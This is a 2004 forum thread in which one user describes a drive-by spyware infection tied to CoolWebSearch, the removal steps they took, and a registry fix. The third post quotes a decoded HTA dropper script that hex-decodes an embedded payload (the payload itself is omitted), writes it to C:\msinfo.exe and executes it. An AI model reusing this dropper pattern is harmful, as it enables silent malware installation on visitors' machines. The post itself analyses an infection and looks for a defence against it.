Synapse Posted October 2, 2004 Posted October 2, 2004 went too a website earlier looking for a sound file "Quagmire from Family guy saying giddy giddy giddy" or whatever.. anyways.. came across one website and when i clicked it had some lesbian porn site............. then my AVG Antivirus came up and said 2 viruses were found.1. C:\Windows\MSOPT.DLL (Downloader.Small.6.BA)2. C:\Windows\System32\IEYY32.DLL (Downloader.agent.2.BN)I got Spyware Blaster and Spyware Guard installed. it came up about 5 times saying trying too change my search page, my homepage, and a bunch of others. I removed the 2 files and when i looked in My C:\ i saw a file named "msinfo.exe" checked my process explorer (syinternals freeware) not the ctrl+alt+delete task manager.. and msinfo.exe was running with an open port...... so i forcefully shutdown that everything else looked fin. so i looked up msinfo.exe and it came back as part of CoolWebSearch... msinfo.exe Process Informationwell... deleted msinfo.exe and ran hijackthis came back with some sites in the trusted sites list. deleted them and checked the list manually. there was 1 that was just an IP address. so deleted that one too. but now everywebsite i come too has the "Trusted Sites" thing down in the lower right corner... even sites i've never visited before have that.....
Synapse Posted October 2, 2004 Author Posted October 2, 2004 hmm......... none of my cookies, temporary files or history is being deleted.. when i right click internet explorer and hit delete....also.. i found the website that caused this... i'm probably gonna install another copy of windows using VMware and visit... see what makes it "tick" lol
Synapse Posted October 2, 2004 Author Posted October 2, 2004 well... decided too go for the gold lol, went back too the site got infected about 6 more times viewed the source of most of the pages.. it redirects A LOT! and they tried covering the data with a weak javascript encryption. then found a file in my temporary internet files.. called *randomname*.hta... this file too is encrypted but i decrypted it a bit...*some HTML crap*c0 = "*LOTS of random letters and numbers, guessing this is the "virus/downloader" itself*" h0 = "" i = 1 Do While i < Len(c0) h0 = h0 & chr(cint("&h" & mid(c0, i, 2))) i = i + 2 Loop set wsh = CreateObject("WScript.Shell") path = "C:\\" set fs = CreateObject("Scripting.FileSystemObject") set ts = fs.CreateTextFile(path + "msinfo.exe", true, false) ts.Write(h0) ts.Close() wsh.Run(path + "msinfo.exe")self.close()</script>*End HTML crap..*so.. i guess i'm gonna look for how too stop .hta extenstions from being executed....
Synapse Posted October 3, 2004 Author Posted October 3, 2004 ok nevermind.. i fixed it after removing the virus/trojan and deletin the files, i went into my registry and deleted everythign under:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settingsand now its all better
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now